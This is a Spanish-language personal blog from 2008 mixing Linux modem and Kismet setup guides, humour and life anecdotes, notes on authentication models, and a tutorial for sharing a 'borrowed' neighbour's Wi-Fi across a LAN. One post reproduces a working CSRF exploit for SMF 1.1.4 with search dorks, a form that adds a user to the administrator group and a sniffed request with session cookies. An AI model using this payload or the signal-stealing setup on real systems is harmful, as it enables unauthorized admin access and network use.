Buenas, queridos usuarios y usuarias aquí teneis un árticulo que escribí hace algún tiempo.

Información:

Slackware 12.0.
Kernel por defecto, 2.6.21.5-smp
Minicom 2.1.
libwvstream.
Módem usb e220.
Compañia vodafone.

Nota: tenemos que tener el kernel actualizado con una version >= 2.6.20, ya que
si no existen problemas y se toma al e220 con un cdrom.

Primero veremos como desactivar el pin a la tarjeta de 64k que nos viene con el
módem, para ello utilízaremos minicom, tendremos que cónfigurar minicom para
que apunte hacia el módem, "/dev/ttyUSB0".

Entramos a minicom, esperamos a que nos de acceso a el módem, tecleamos
"ATZ" sin las comillas y presíonamos enter, seguídamente introducimos
(at+clck="sc",0,"XXXX"), donde XXXX es el pin actual, sin los paréntesis.

PD:Sí en un futuro queremos volver a habílitar el ping, ""at+clck="sc",1,"XXXX".

Instalamos libwvstream y wvdial (http://freshmeat.net/projects/wvdial/), ahora
creamos el fichero de configuración de wvdial en el directorio "/etc/" con el
nombre "wvdial.conf", dentro del fichero copiaremos esto:

[Dialer minet]
Phone = *99***1#
Username = vodafone
Password = vodafone
Stupid Mode = 1
Dial Command = ATDT
Modem = /dev/ttyUSB0
Baud = 460800
Init2 = ATZ
Init3 = ATE0V1&D2&C1S0=0+IFC=2,2
ISDN = 0
Modem Type = Analog Modem
Init5 =AT+CGDCONT=1,"IP","ac.vodafone.es";

A continuación guardamos y conectamos el módem e220, esperamos un poco
hasta que el sistema reconosca el dispositivo, apagamos todas las conecciones ya
sean por wireless o ethernet, "ifconfig [interfaz] down".

Ahora ejecutamos, "wvdial minet".......esperamos.....



Este texto puedes modificarlo, tomar partes de él y redistribuirlo.

Sugerencias o mejoras podeis enviarmelas por correo a esta dirección: antoniofelixes@arcoscom.com

Un Saludo.

martes, 20 de mayo de 2008

Manual Kismet

Hago este manual ya que hace poco en el foro de elhacker.net vi un post de una persona que no le funcionaba el kismet, al no configurar el kismet.config nos da un error y al final dice:

Kismet Exiting



esto es solo por que aun no se a configurado kismet, son tres simples pasos los que se tienen que seguir, antes definamos kismet tal y como esta en man kismet (usen un traductor si no entienden ;-P)

Tomado de man kismet:


kismet -- Wireless sniffing and monitoring

DESCRIPTION
Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic.

Kismet identifies networks by passively collecting packets and detecting standard named networks, detecting (and given time, decloaking) hidden networks, and inferring the presence of nonbeaconing networks via data traffic.
kismet supports logging to the wtapfile packet format (readable by tcpdump and ethereal) and saves detected network informat as plaintext, CSV, and XML. kismet is capable of using any GPS supported by gpsd and logs and plots network data.

kismet is divided into three basic programs, kismet_server kismet_client
and gpsmap



Abrimos el archivo kismet.conf que generalmente se encuentra ubicado en la carpeta /etc (/etc/kismet.conf) puede ser con cualquier editor de texto que sea de su agrado (kwrite,jedit,nano, etc...)

Son dos lineas las que tendremos que cambiar, las ubicamos primero:

# User to setid to (should be your normal user)
suiduser=your_user_here

# Sources are defined as:
# source=sourcetype,interface,name[,initialchannel]
# Source types and required drivers are listed in the README under the
# CAPTURE SOURCES section.
# The initial channel is optional, if hopping is not enabled it can be used
# to set the channel the interface listens on.
# YOU MUST CHANGE THIS TO BE THE SOURCE YOU WANT TO USE
source=none,none,addme

en esas dos lineas vemos suiduser=your_user_here y source=none,none,addme (como lo pueden ver ahi dice tu usuario aqui, y en la segunda parte nada nada agregame xDDDDDDDDDD)

en la linea de suiuser pondre como usuario root, que es el user que uso, queda asi:

suiduser=root

para la segunda linea, en mi caso tengo una tarjeta atheros(airlink 101), una ipw3945 (integrada con la lap) y una Realtek 8187L(AWUS036H o alfa como la mayoria la conoce), agregare la tarjeta alfa a la configuracion, quedaria de esta forma:

source=rt8180,wlan0,rt8180

despues de agregar las dos lineas, guardamos y cerramos el editor de texto.

Volvemos a correr Kismet y funcionara a la perfeccion:



esta es solo la configuracion basica para que funcione Kismet, si les interesa un poco busquen y lean mas acerca de esto y asi podran ver mas acerca de su configuracion :-D

Saludos

Armar red lan con internet a partir de una wlan "prestada"

Bueno en este tutorial explicare como armar una red lan a partir de una red wlan "prestada" (wireless) y asi podran tener internet gratis en varias pc's a partir de una lap top con la cual roban señal, veamos lo que necesitamos:


Cable Cruzado (crossover)



Cable Directo (el cable normal de ethernet)



Maquina con la que tomaran prestada señal wireless



Y por ultimo un router



expliquemos :-)

Lo primero que haremos sera tener la conexion lan externa, de ahi se nos asigna una ip por ejemplo:

192.168.1.75

ok tenemos nuestra ip quesera la que tiene la tarjeta wireless, de ahi vamos a configurar nuestro router con una ip quenosostros asignemos, por ejemplo:

10.10.10.254

esa sera la ip de nuestro router, ya hecho esto configuraremos nuestras tarjetas de ethernet asi:

10.10.10.x

entonces nos quedaria nuestra configuracion asi:

Maquina que roba señal wireless:

Configuracion Wireless:
IP : 192.168.1.75
Macara de subred: 255.255.255.0
Puerta de enlace predeterminada: 192.168.1.254 //(Esto varia de acuerdo al router wireless)
DNS Principal: 192.168.1.254 //(Esto varia de acuerdo al router wireless)
DNS Secundario: 192.168.1.254 //(Esto varia de acuerdo al router wireless)

Configuracion Ethernet
IP : 10.10.10.90 (ejemplo)
Mascara de Subred: 255.255.0.0
Puerta de enlace predeterminada: 10.10.10.254
DNS Principal: 10.10.10.254
DNS Secundario: 10.10.10.254

Maquinas de nuestra lan:

Maquina Uno:

IP : 10.10.10.32
Mascara de Subred: 255.255.0.0
Puerta de enlace predeterminada: 10.10.10.90 //(Como se dan cuenta es la ip de donde se roba la señal)
DNS Principal: 10.10.10.90 //(Como se dan cuenta es la ip de donde se roba la señal)
DNS Secundario: 10.10.10.90 //(Como se dan cuenta es la ip de donde se roba la señal)

Maquina Dos:

IP : 10.10.10.33
Mascara de Subred: 255.255.0.0
Puerta de enlace predeterminada: 10.10.10.90 //(Como se dan cuenta es la ip de donde se roba la señal)
DNS Principal: 10.10.10.90 //(Como se dan cuenta es la ip de donde se roba la señal)
DNS Secundario: 10.10.10.90 //(Como se dan cuenta es la ip de donde se roba la señal)


Bueno siguiendo ese esquema y esta forma de configuracion tendran internet en lasmaquinas de su red local, con la conexion inalambrica que estan tomado....

La funcion del router nuestro solo es asignar esas ip's y transmitir la señal hacia nuestras computadoras

Esta probado por mi y les aseguro que funciona :-)



Komtec1

viernes, 16 de mayo de 2008

Sorteo en python

Aqui dejo el code que me pidio kakalake, es para hacer un sorteo en random de n numero de concursantes, lo hice para el torneo de ajedrez de hslt jeje :-D

import random
a, b, c = 0, 9, []
res = 1
partida = 1
concursantes = int(raw_input("Numero de concursantes: "))
print '\n Seran ', concursantes, 'concursantes'
print '\n Escribe el nombre de cada uno: '
while concursantes > 0:
d = raw_input("")
c.append(d)
concursantes = concursantes-1
print '\nLos Concursantes que ingresaste son: ', c
while c > 0:
if c == []:
print 'Listo'
break
else:
a = random.choice(c)
b = random.choice(c)
if a == b:
a = random.choice(c)
b = random.choice(c)
else:
print 'Partida Numero ', partida, ': ', a
print 'Partida Numero ', partida, ': ', b
c.remove(a)
c.remove(b)
partida = partida + 1
if c == []:
print '\nSorteo Terminado'
print 'A Jugar :-D'


Saludos!

lunes, 5 de mayo de 2008

Deja te conecto

si solo una vez,
hinchado en alcohol, perdido en la noche,
soñando con volver, con volver.

Y solo quiero que me des un poco de sinceridad,
y solo quiero que me des un poco de sinceridad.


that song rockz! don u think?

sábado, 3 de mayo de 2008

MSN Down

Cancele mis cuentas de msn, si alguien quiere comunicarse que sea por aqui el blog o por mail komtec1@gmail.com :-) Saludos

jueves, 1 de mayo de 2008

El exnovio de la exnovia xD

jjajajajajajjaajaj

el exnovia de mi exnovia le pide a su exnovio que le pase a su exnovio, para lo que el exnovio responde al exnovio que quien es y que es su exnovia le responde...

tiene sentido??? xD aajajajajajajajjaj aunque no lo crea si me pasa ja ja ja

viernes, 25 de abril de 2008

Buscar novia perfecta en GNU/Linux

En este artículo quiero demostrar que GNU/Linux es más que un sistema operativo y te puede ayudar hasta con tu vida personal. Por ejemplo, a buscarte la novia perfecta y todo lo que viene después, que no es poco…

Espero que no haga falta decir que es un artículo de humor y bastante geek xD

Empezaremos por buscar una novia

$ aptitude search novia

Nos la quedamos

$ aptitude install novia

Ojeamos sus atributos

$ stat novia

La comparas con otra a la que tanteabas desde hace una semana

$ cmp novia la_otra

Compruebas si hay conexión

$ ping novia

Y cómo es dicha conexión

$ netstat

Sí, definitivamente nos la quedamos. Nos aseguramos que sepa que somos su novio…

$ chown yo novia

…y de que no nos pueda poner los cuernos…

$ chmod 700 novia

La moldeamos a nuestro gusto

$ cat 95-60-90 >> novia

Nos vamos a una fiesta en casa de unos colegas y tenemos un calentón. Nos vamos a un lugar aislado, oculto

$ cd .dormitorio_padres_colega

Comprobamos que no hay nadie más

$ ls -a

Buscamos el fastidioso enganche del sujetador…

$ grep 'enganche_sujetador' novia

Al lío. Conectamos nuestros cuerpos de la forma tradicional

$ ssh yo@novia

Si alguien quiere un 69 (u otro “slot”), tan sólo hay que decírselo

$ ssh -p 69 yo@novia

Dejamos nuestra semilla

$ wget http://yo.com/semilla

Y separamos nuestros cuerpos

$ exit

Ordenamos y limpiamos un poco el cuarto

$ clear

Poco después te enteras de que metiste el penalti (¡Maldito preservativo!). Nueve meses más tarde tu novia da a luz

$ tar -xzvf novia.tar.gz

Por las presiones de las familias, decides formalizar la relación y os casáis. Fundáis una familia con todo lo que ello conlleva…

$ addgroup familia
$ adduser novia familia
$ adduser hijo familia
$ alias parienta=”novia”
$ alias crio=”hijo”

Haces una nota mental para acordarte de este “”"”maravilloso día“”"” y que no se te olvide, todo ello para evitar que no te ponga a parir la parienta

$ crontab -e

Todo va bien hasta que inexplicablemente un día se le cruzan los cables a la parienta y mata a vuestro hijo

$ pkill hijo

Meditas sobre todo lo que ha sucedido y sobre las mujeres

$ man mujeres

Y efectivamente llegas a una sabia conclusión

$ No existe entrada de manual para mujeres

Pese a que te aseguraste de que no tendrías cuernos, si ambos sois de una raza y el crío de otra, o tienes otro tipo de confirmación, vete buscando a un tal root…

$ find / -name root

* Espero que las lectoras féminas (si las hay) entiendan el toque de humor, incluidas las pinceladas ¿machistas? xD

* Ningún menor de edad ha sido dañado en el desarrollo de este relato.

Copy and paste de http://www.lugsaju.com.ar/2007/06/buscar-novia-perfecta-en-gnulinux.html que a su vez fue copy paste de: http://tuxpepino.wordpress.com/

jajajajajjajaajj me parecio genial y lo tenia que publicar xD jajajajaaajajaj muy genial xD

martes, 15 de abril de 2008

Recordando lo que es la vida

Bueno hace algo de tiempo que hslt esta down, aun no se sube por lo de la union y demas que se ha comentado, bueno solo quiero poner algunas cosas que me recuerdan lo que es la vida, jejeje y mas ahora que he tenido 93847293847298437743 de tiempo.

cosas buenas del metro:

1.-puedes leer en el metro, es en lo mejor que te ocupas mientras te transportas.
2.-servicio de las "3b" (bueno,bonito y barato) (mas adelante explico el por que entre comillas esto jejej)
3.-rapido

y aqui llegamos a lo mas interesante, que me recuerda por que odio hacer viajes en el metro, era un domingo por la tarde ;-P a las 13:00 horas, tenia que viajar de metro cd Azteca a metro Tasqueña, para despues llegar a la bendita Cuernavaca xD pero gracias a que ahora creo que cd Azteca es una "zona comercial xDDDDD" se han sucitado muchos problemas en respecto a la cantidad de gente por esa zona :-P aqui describo lo que se ve en el bendito metro, al menos por el domingo que fue que hice ese viaje largo jejej

1.- cuando es domingo esta atascadisimo. (sin contar por las mañanas que eso ya se sabe por todos)
2.- se suben como 203492840928 gentes a vender cosas y no dejan leer ¬¬ o al menos no lo puedes hacer sin que te distraigas
3.-La gente APESTA, y no no crean que soy mala onda y le digo a la gente que chingue a su madre o x cosa, como muchos le toman el sentido de apesta asi como feo o algo asi, si no que lo digo con el sentido que es, en verdad apestan xD huele horrible la gente los domingos (no todos claro, hay excepciones xD) osea si vas a salir de tu casa, psss me baño o x cosa no se que se yo al menos si no se quieren bañar se ponen locion o perfume las nenitas, pero no NO, hay gente que le vale madre, asi bien pero bien vale madre y asi se sube.
4.-hay personas tan mal educadas, y en esto me refiero a cabrones, por que TODOS sabemos que los pinches asientos de uan sola persona estan reservados a gente de la 3a edad, mujeres embarazadas o con niños, o a niños en su defecto, psss no los cabrones nada mas hacen como que se duermen, y no dejan sentar a ninguna mujer ni persona que necesita el lugar, pfff bueno...

por fin llegue a la terminal de tasqueña ;-P y compro mi boleto, salgoen 10 min despues de que llegue, y para amolarla PONEN UNA PELICULA QUE HE VISTO 2039482039482 VECES xD jajajajajajaja, bueno bueno no tan quejumbroso xD me resigne y dije ok la veremos no esta tan fea jejjejejejej

llegando a cuerna, en primera dije bueno pss vamos a comer unos tlacoyitos que se ven deliciosos jejeje, y pss dicho y echo como se veian estaban, (de requeson por cierto dos :-P), hay una ruta que me lleva a guacamayas en cuerna, de hecho 2 la 1 y la 18, llego a la esquina donde pasan creo que todas las rutas y ahi espero, volteo y me pongo a babosear en quien sabe que cosa, y cuando me doy cuenta la ruta 1 se me habia pasado ¬¬ xD jejejej bueno estube esperando como 30 min y ni madres termine tomando un taxi por que inches rutas como se tardan en pasar xD jejejeje, bueno de ahi en fuera pss ya todo estubo tranquilo, y hoy (o ayer) lunes me levanto temprano, con toda la intencion de irme al df para llegar al trabajo y demas, pero psss termine en cuautla comiendo cecina de Yecapixtla xD que por cierto muy rica esa pinche cecina jejejej con una salsa de chile manzano, que pfff estaba genial jejej, despues de eso de vuelta a cuernavaca y de ahi a una botanera jejejej un poco de whisky con cerveza, ya para regresar y descansar de nuevo, ahora si mañana me voy a la oficina temprano jejejej

Bueno ahora si el titulo del post, psss es por eso, si salgo, no he dejado de salir, pero pss he tenido menos presiones ahora, por lo que cuando salgo lo disfruto mas creo :-D

todo genial

Saludos

Komtec1

sábado, 8 de marzo de 2008

LOL xDDDDDDD

Komtec1@hslteam~against-revision-140# make
make -C src
make[1]: Entering directory `/root/against-revision-140/src'
Building USB Video Class driver...
/bin/sh: line 0: cd: /lib/modules/2.6.21.5/build: No such file or directory
make[1]: *** [uvcvideo] Error 1
make[1]: Leaving directory `/root/against-revision-140/src'
make: *** [all] Error 2
Komtec1@hslteam~against-revision-140# xDDDDDDDDD
-bash: xDDDDDDDDD: command not found

jajajajjajajaaajajajaja

viernes, 7 de marzo de 2008

Autenticacion, Autorizacion y Registro de Usuarios

Bueno este tema sera algo extenso, espero alguien se tome la molestia de leerlo completo asi como yo me tome la molestia de escribirlo :-P este tema lo aprendi de un libro, el cual es Enciclopedia de la Seguridad Informatica del Autor Alvaro Gomez Vieites, lo pondre a mis palabras y a mi entendimiento, si alguien desea consultar el libro a las palabras del autor ahi lo tienen :-)

Espero les guste el tema y no se cansen de leerlo que como ya mencione es extenso, aqui vamos :

Definiremos varios tipos de autentificacion de usuarios frente a un sistema informatico (cliente-servidor)

Modelo de Seguridad AAA (Authentication, Autorization & Accounting)

Se podria traducir de la siguiente forma: autenticacion, Autorizacion y Registro, este se utiliza para poder idenificar a usuarios y controlar el acceso de los mismos a diferentes recursos en un sistema informatico, y a la vez registrando como se utiliza cada recurso.

Basamos el modelo en tres elementos principales los cuales son:

Identificacion y Autorizacion:

Identificacion: Se presenta determinada identidad para identificar al usuario
Autorizacion: Valida la autenticidad del usuario

Control de acceso: Determina que provilegios tiene un usuario dentro del sistema informatico y a que recursos tendra acceso dentro del mismo.

Registro del uso de los recursos: Logs que seran guardados para monitorear la actividad del usuario dentro del sistema informatico.

Control de acceso (Seguridad Logica)

En estos distinguimos dos tipos de control de acceso:

Control de acceso obligatorio (MAC Mandatory Access Control): Los permisos son definidos por el sistema

Control de acceso direccional (DAC Directional Access Control): Aqui los permisos los controla el propietario de cada objeto

de ahi para definir los sujetos que pueden accesar a cada objeto se utilizan las listas de control de acceso (ACL Access Control List) y de este modo se puede regular no solo la autentificacion del sujeto si no tambien una hora y/ hubicacion de acceso.

Identificacion de Usuarios

La identidad la determinamos con puntos como el conjunto de cualidades únicas e irrepetibles que lo hacen distinto a los demas.

Los identificadores los podemos definir entre dos tipos:

Intrísecos y Extrínsecos:

Intrísecos

Dentro de estos podriamos mencionar algunos como el ADN de la persona, fondo del ojo, iris, huellas dactilares, fisionomia de las manos, rasgos faciales, timbre de voz, cinematica de la firma manuscrita, etc etc...

Extrínsecos

Dentro de este tipo estarian algunos como estos: PIN, contrasña, firma manuscrita, numero de cuenta bancaria, terminal desde que se conecta el usuario, etc etc...

esto termina definiendose de esta manera:

lo que se sabe: password, PIN

lo que se tiene: token, USB Key, tarjeta de credito.....

lo que se es: caracteristicas bimetricas de la persona (mencionadas arriba)

lo que se sabe hacer: firma manuscrita...

y por ultimo donde se encuentra el usuario: ip previamente asignada, podria ser dentor de redes fisicas protegidas y controladas...

Verificacion de Contraseñas

Este es el que se usa con mayor frecuencia dentro de todos los sistemas informaticos, que consta de un login y un password (usuario y contraseña) a cada usuario se le define un usuario y una contrasña, unica e irrepetible, hay algunos minimos requisitos para la seguridad de las contraseñas, ya sean como:

-Longitud minima de las contraseñas (es recomendable una longitud de 6 digitos, por ahora)
-Caducidad de la contraseña, en este se define cuanto tiempo sera valida una contraseña
-Logs de historial de contraseñas, una vez que caduque la contraseña, no permitir al usuario repetirla
-Control de composicion de una contraseña, especificar que una contraseña debera de contener minimo un numero y un signo especial (!"#$%&/ etc etc...) y no contenga ninguno de sus datos de DNI, matricula, fecha de nacimiento etc etc...

Protocolos de Desafio/Respuesta

En este se basa en que el usuario se autentifique de manera que demuestre saber y compartir un secreto con el sistema de autentificacion (en si compartir un secreto :-P) en estos se podria poner una contraseña asociada a una cuenta del usuario, la llave de un sistema criptografico simetrico, etc...

de esta manera no se propodciona ninguna informacion del secreto compartido, uya que simplemente el usuario debera de demostrar ante el autentificador que comparte dicho secreto, por lo tanto se evita el problema de que una contraseña se envie por red y por lo tanto evitando un arp spoof (la intercepcion de las redes en area local)

Lista de Contraseñas (OTP One Time Password)

Como el nombre lo indica, son passwords que funcionaran dentro del sistema una sola vez, por lo tanto evitando que si algun usuario malicioso captura la contraseña, pueda loguearse de nuevo con esa misma

Contraseña Variable

En este tipo de autentificacion, el usuario posee una contraseña de x longitud de caracteres, el sistema valida pidiendo caracteres en forma "random" al usuario para poder identificarse, el ejemplo seria este:

esteesmipass

el sistema podria pedir esto:

Ingresa el caracter numero 4, 1, 5, y 1

eeee

esa seria la contraseña valida al momento, y al otro intento de secion pedira diferentes caracteres, por lo que es un sistema seguro de logueo, este sistema actualmente se usa en bancos (por ejemplo HSBC)

Tarjetas de Autenticacion

Este sistema se basa en dos tipos de autentificacion, el primero sera el conocimiento del PIN y el segundo la posecion del token, por lo que se necesita medio fisico (lo que se tiene) y lo que se sabe ( ya mecionados antes)

Bueno esta es parte de autentificaciones, conforme tenga mas tiempo les pondre otros tipos de sistemas de autentificacion (faltan como 6 nada mas :-P pero ya me canse de escribir xD) hice referencias a algunas partes del libro ya que todo de memoria como es no lo se, si no hice eso que para dar una mejor explicacion hacia uds, bueno espero si se hayan molestado en leerlo :-P

Saludos

Komtec1

domingo, 10 de febrero de 2008

Nerdtest ja ja ja xD

Bueno paseando por el gran mundo del internet xD me encontre con estos tests xD ajajajajajajajajaj y bueno creo que soy un nerd xDDDDDDDDDDD aajajajajajajajajajjajajajajajajajaja me mata xD


I am nerdier than 81% of all people. Are you a nerd? Click here to find out!



NerdTests.com says I'm a Dorky Technology Geek.  What are you?  Click here!


Komtec1

miércoles, 30 de enero de 2008

SMF 1.1.4 - Add User In Group [CSRF]

Bueno en primera este post lo saque de remoteexecution.es el link es este:

http://www.remoteexecution.es/foro/index.php?topic=879

Dork: "SMF 1.1.4"
Dork (SID): inurl:index.php inurl:sid= "SMF 1.1.4"


< h t m l >
< h e a d >
< b o d y >
< action="http://adress.com/path/index.php?action=membergroups;sa=members;group=GroupID" method="post" type="text" name="toAdd" id="toAdd" size="30">
< type="submit" name="add" value="Add Members">
< type="hidden" name="sc" value="ADMIN SESSION ID">
< /form>
< /body>
< /html>

o si no tambien se puede usar

forum/path/index.php?action=membergroups;sa=members;group=groupid;toAdd=usertoadd&add=Add+Members&sc=sid
by Syntacks!

Todo lo que usted necesita es administrador identificación de la sesión (SID), intentan engañar a los admin (utilizando cookie stealer etc ..)

|| *************** ||
|| Author: phAnt0mh4ck3r ||
|| ************************* ||
|| SMF 1.1.4 - Add User In Group [CSRF] ||
|| ________________________________________________________________ ||
|_________________________________________________________________________


ahora lo pongo por la explicacion de aqui abajo :-P

Bueno platicando con Em3Trix me dijo que no le funcionaba y demas entonces cheke el code que ponen aqui lo revise un poco y vi que no daba por que no ponia nada de usuario, generalmente saben que lo hace para evitar un copy paste (o scriptkiddies :-P) :P entonces bueno dije veamos que pasa y que falta puse mi backtrack, y dos maquinas en lindows una de ellas en vmware, me conecte a mi red local y en una tenia montado smf, en la otra de lindows era donde hiba a hacer los cambios y en la de backtrack es donde iba a snnifear que es como se sacan los CSRF (snnifeando) :P ok puse mi ettercap en accion xD y el resultado fue esto:


POST /smf/index.php?action=profile2 HTTP/1.1.
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*.
Referer: http://192.168.1.64/smf/index.php?action=profile;u=2;sa=account.
Accept-Language: es.
Content-Type: application/x-www-form-urlencoded.
Accept-Encoding: gzip, deflate.
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1).
Host: 192.168.1.64.
Content-Length: 260.
Connection: Keep-Alive.
Cache-Control: no-cache.
Cookie: PHPSESSID=0585e394dfabf69c18a586d91b93ae84; SMFCookie956=a%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A40%3A%22596fe11e6a4ac2039e5d80c345060d6c5b1dcbd8%22%3Bi%3A2%3Bi%3A1390709326%3Bi%3A3%3Bi%3A0%3B%7D.
.
realName=prueba&dateRegistered=2007-12-27&posts=0&ID_GROUP=1&additionalGroups%5B%5D=0&emailAddress=prueba@prueba.com&hideEmail=0&showOnline=0&showOnline=1&passwrd1=&passwrd2=&secretQuestion=&secretAnswer=&sc=7480880c30be3b8e5b1dc32a3755150f&userID=2&sa=accountHTTP/1.1 302 Found.
Date: Mon, 28 Jan 2008 04:09:50 GMT.
Server: Apache/2.2.4 (Win32) PHP/5.2.3.
X-Powered-By: PHP/5.2.3.
Expires: Thu, 19 Nov 1981 08:52:00 GMT.
Cache-Control: private.
Pragma: no-cache.
Location: http://192.168.1.64/smf/index.php?action=profile;u=2;sa=account.
Content-Encoding: gzip.
Vary: Accept-Encoding.
Content-Length: 26.
Keep-Alive: timeout=5, max=100.
Connection: Keep-Alive.
Content-Type: text/html.


no pongo todo el resultaod si no solo lo mas importante :-P

en la parte de:

realName=prueba&dateRegistered=2007-12-27&posts=0&ID_GROUP=1&additionalGroups%5B%5D=0&emailAddress=prueba@prueba.com&hideEmail=0&showOnline=0&showOnline=1&passwrd1=&passwrd2=&secretQuestion=&secretAnswer=&sc=7480880c30be3b8e5b1dc32a3755150f&userID=2&sa=accountHTTP/1.1

ahi se ve lo primero quees realName entonces ya le dije a Em3Trix que esa era la unica parte que faltaba y la agregara en el code y quedaria asi:

(se agrego esa parte por que es el identificador de usuario, tal vez tambine se pueda con el id de registro del user :-) )

< h t m l >
< h e a d >
< b o d y >
< action="http://localhost/foro/index.php?action=membergroups;sa=members;group=1;realName=Em3Trix" method="post" type="text" name="toAdd" id="toAdd" size="30">
< type="submit" name="add" value="Add Members">
< type="hidden" name="sc" value="ADMIN SESSION ID">
< /form>
< /body>
< /html>


donde realName sera el nombre del usuario que quieren elevar los privilegios y el group=1 es el grupo de administradores

entonces ahi tienen para que les funcione bien y sin problemas :-)

Saludos

Komtec1

viernes, 18 de enero de 2008

Superacion Personal

Bueno aqui un poco mas de la historia de mi vida :-D aqui vamos espero no aburrirlos jejej como en los otros posts que he puesto :-P yaque este por lo que veo sera un poco largo, si lo leen todo dejen un comentario jejeje :-P

El comienzo

1o (Primero) de junio del 2006

Muahahahaha tengo el pass del msn de mi novia encriptado en hexadecimal, lo unico malo es que no secomo hacer para "descifrar" eso, vamos a buscar en internet, O aqui hay una pagina que se ve interesante, vamos a entrar.

Se ve que si ayudan a la gente, hay muchos usuario que ayudan y demas :-O genial me voy a registrar para preguntarles haber si saben como "descifrar" el pass en hexa

---------------------------------------------------------------
Nota:
Lo tenia en hexadecimal por que mi novia guardaba el pass en su pc, entonces quedaba guardado en el registro de lindows...
---------------------------------------------------------------

Pregunta:

Alguien me puede ayudar en descifrar esto:

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

es el pass de un msn que lo saque del regedit y pss no tengo ni ideade como hacerlo...

Respuesta:

no msn es de lammers

Pensamiento:

pero pero pero no es msn es un hexa..... weno ya que :-P

en una de esas veo en un post el titulo de un user:

Clan PRHackers Union

:-O :-O :-O yo quiero estar en un clan de hackers

ese mismo dia mando un mp al usuario que tenia ese titulo:

Hola puedo entrar a su clan??? que hago??? que necesito???

Respuesta:

No psss lo unico es aprender y no se pide se da, si vemos que sabes te metemos, tu solo dedicate aaprender

Pensamiento:

weno pss si tienen razon....

Pasa el tiempo aprendo y demas, consigo mi titulo de Clan PRHackers Union pfff que felicidad jejejej :-D

El Intermedio

(2006 Mediados de Agosto)
weno paso el tiempo y conoci a _ANtrAX_ un bune amigo hasta la fecha, pasael tiempo y un dia me dice voy a dar ponencia a México en Tuxtla Gutierrez y yo asi de :-O genial ya quisiera dar una ponencia yo pero no se ni madres xD cuando estubo aqui en México recuerdo le comente pfff ami me faltan años para que pueda dar una ponencia....

(2007 Mediados de Febrero)
despues pasa algo mas de tiempo y conosco a AzRaEL amigo hasta la fecha tambien y me dice pss voy a dar una ponencia en el CONSOL si quieres ahi nos conocemos y yo asi de nuevo :-O quisiera dar una ponencia tambien :'(

El Final ( De este post no de la historia, a esto aun le faltan años (espero) jejej :-D)

(2007 Mediados de Agosto)
weno pasa mas tiempo aun y el 2007 un amigo me recomienda para dar ponencia en Tuxtla Gutierrez donde el año pasado antrax dio una ponencia, mando mis papeles y todo y psss doy un taller en tuxtla gutierrez :-D pffff que felicidad me dio ese dia :-D

regreso y todo y un amigo me comenta que ya a va a ser el CONSOL y digo ahhh caray yo recuerdo ese nombre de donde de donde, ahhhh si ya ya ya, y me dice por que no mandas tu solicitud haber si la aceptan, con un poco mas de confianza en mi digo pss bueno nada pierdo, mando mi solicitud y demas y ahora me responden que mi ponencia esta a punto de ser aceptada y que solo mande mis docs para que los revisen :-D

jojojojo y llega el momento en que me siento feliz y veo que he ocupado mi tiempo en algo de provecho y pss como siempre he dicho de auqi en adelante mas aun, aun hay muchas muchisisisisissisismas cosas que me faltan por aprender y pss a eso voy primero Dios :-D

Komtec1

martes, 15 de enero de 2008

jajajajaja luove xD

Todo comenzo un miercoles (era martes me equivoque al poner esto cada dia estoy mas loco xD) por la noche cuando estaba en el departamento xD sentado en la pc escuchando música.....

personajes:

YO - Y
CHAVA - C
SEÑORA - S
Lo que se pone entre parentesis son pensamientos xD

tiiiiiiiiiin tiiiiiiiiiiin suena el timbre
Y: Que weba quien sera??? nadie me busca a estas horas de la noche y menos entre semana
Se escuchan voces afuera...
Me asomo por la ventana y veo a una señora bajando con su hija por las escaleras, supongo yo quien habia tocado el timbre de la puerta....
Abro la puerta y la señora y su hija ya estaban en el piso de abajo, voltean a verme...
Y: Buenas noches
C: Si esta mamá
C: Buenas noches
S: Buenas noches
S: Psss dile tu hija
Y: (pensando a caray que onda 0.o)
C: (Se acerca) Hola
Y: Hola
C: ahhh es que lo que pasa
Y (ahhh caray que onda ¿'? me declarara su amor? xD jajajaaja xD me dira que le baje a la musica, queme dira que me dira??????? y ahorita?????? a las 10 de la noche??? por que vienen ahorita, por que me ve asi, que onda, que pasa, por que llevo pensando como 5 minutos, creo que tengo una lucha en mi cabeza xD todo pasa por mi cabeza, ya ya va a hablar, ya me va a decir algo, callate para que la puedas escuchar tonto!)
C: venia por el dinero de la luz del edificio
Y: (jajajajajajajajajajajajajjaajajajaajajajajajajajajajajajajajaja)
C: son
Y: (jajajajajajajajajaajjajaajaajajajajajjajaajajajajaj
C: treinta
Y: (juajuajuajaujauajuajuajuajuajauajaujau yo imaginandome tirado en el piso riendo jajajajajajaajajajaj)
C: pesos
Y: ahh claro esperame tantito ya los traigo :-D
C: ok ^^
Y: (rumbo al cuarto pensando en jajajajajajajaajjajajajajaaajajajajajaajajajaja)
Y: aqui tienes :-D
C: esperame te doy tu cambio
Y: ok :-D
C: bye bye ^^
Y: (:O y esos ojos que hizo??? :O :O :O :O :O :O por que fue eso, que onda le gustare??? naaa no creo, o igual y si, es de noche y no me ve tan feo jajajajaj xD) nos vemos cuidate :-)
Y: Buenas noches señora
S: Buenas noches hijo
Y: (hijo???? por que me dicee hijo???? ahh caray, cada dia estoy mas paranoico xD)
Y: Cierro la puerta
Y: Hay hay cada dia estoy peor jajaj xD

jajajajajaj sicreo que cada dia estoy un poco mas loco xDDDDD

Komtec1

domingo, 6 de enero de 2008

airpwn

Bueno aqui el video de como usar airpwn, viene una explicacion rapida dentro del video, pronto hare un tuto completo, mientras aqui tienen el video :-D

http://www.mediafire.com/?9hpdxd5jhnd tar

http://www.mediafire.com/?4djjbxdmjku rar

http://www.mediafire.com/?f2ovkznbcyo airpwn 1.3

Saludos

Komtec1